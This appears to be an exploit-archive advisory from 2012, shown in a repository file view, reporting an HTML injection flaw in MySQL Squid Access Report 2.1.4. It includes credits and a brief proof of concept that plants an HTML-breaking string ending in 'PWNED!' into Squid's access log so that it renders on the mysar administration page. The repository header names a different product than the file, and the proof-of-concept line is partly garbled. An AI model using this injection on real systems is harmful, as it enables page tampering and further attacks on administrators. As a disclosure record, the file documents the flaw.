4e7ab00187
204 changes to exploits/shellcodes Charity Management System CMS 1.0 - Multiple Vulnerabilities
24 lines
No EOL
1,006 B
Text
24 lines
No EOL
1,006 B
Text
# Exploit Title: MySQL Squid Access Report 2.1.4 / HTML Injection#
|
|
Date: 23/07/2012
|
|
# Author: Daniel Godoy
|
|
# Author Mail:DanielGodoy[at]GobiernoFederal[dot]com
|
|
# Author Web: www.delincuentedigital.com.ar
|
|
# Software web: http://sourceforge.net/projects/mysar/
|
|
# Tested on: Linux# Dork: MySQL Squid Access Report 2.1.4
|
|
# www.chap.cl
|
|
# Este Advisory fue reportado por Daniel Godoy, integrante deProject CHAP Security
|
|
# be secured /stay secure
|
|
# contacto@chap.cl
|
|
|
|
[Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,Maximiliano Soler, Pablin77,_tty0,
|
|
Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp her0, r0dr1 y demas user de RemoteExecution
|
|
www.remoteexecution.info www.remoteexcution.com.ar
|
|
#RemoteExecution Hacking Group
|
|
|
|
[PoC]
|
|
find Squid's access.log file path and insert "> Example: ">PWNED!
|
|
|
|
http://server/mysar/www/?a=administration
|
|
|
|
-------------------------
|
|
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com |